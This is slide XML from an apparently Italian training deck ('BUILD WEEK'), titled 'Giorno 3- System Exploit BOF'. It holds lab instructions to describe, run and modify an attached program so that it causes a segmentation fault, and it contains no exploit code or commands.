          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1308256" cy="77776"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="77776" w="1308256">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1308256" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308256" y="77776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77776"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="19050" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 11" id="11"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="1308256" cy="58726"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>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2338989" cy="7269498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="16451985" cy="9692664"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 3" id="3"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="66675"/>
              <a:ext cx="16451985" cy="3039816"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="8880"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="8000" spc="-240">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>Giorno 3- System Exploit BOF</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="3790985"/>
              <a:ext cx="15564712" cy="5901679"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="3899"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2999">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>LEGGETE ATTENTAMENTE IL PROGRAMMA IN ALLEGATO. VIENE RICHIESTO DI: </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="647700" indent="-323850" lvl="1">
                <a:lnSpc>
                  <a:spcPts val="3899"/>
                </a:lnSpc>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2999">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>DESCRIVERE IL FUNZIONAMENTO DEL PROGRAMMA PRIMA DELL’ESECUZIONE </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="647700" indent="-323850" lvl="1">
                <a:lnSpc>
                  <a:spcPts val="3899"/>
                </a:lnSpc>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2999">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>RIPRODURRE ED ESEGUIRE IL PROGRAMMA NEL LABORATORIO - LE VOSTRE IPOTESI SUL FUNZIONAMENTO ERANO CORRETTE? </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="647700" indent="-323850" lvl="1">
                <a:lnSpc>
                  <a:spcPts val="3900"/>
                </a:lnSpc>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2999">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>MODIFICARE IL PROGRAMMA AFFINCHÉ SI VERIFICHI UN ERRORE DI SEGMENTAZIONE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="true" flipV="false" rot="-231817">
            <a:off x="-2041502" y="5206915"/>
            <a:ext cx="21853999" cy="7390754"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7390754" w="21853999">
                <a:moveTo>
                  <a:pt x="21853999" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7390753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21853999" y="7390753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2185399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5289355" y="1047750"/>
            <a:ext cx="1969945" cy="336959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk Bold"/>
              </a:rPr>
              <a:t>BUILD WEEK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DAF7QCJT-lc</dc:identifier>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-08-01T06:04:30Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:title>Giorno 1</dc:title>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>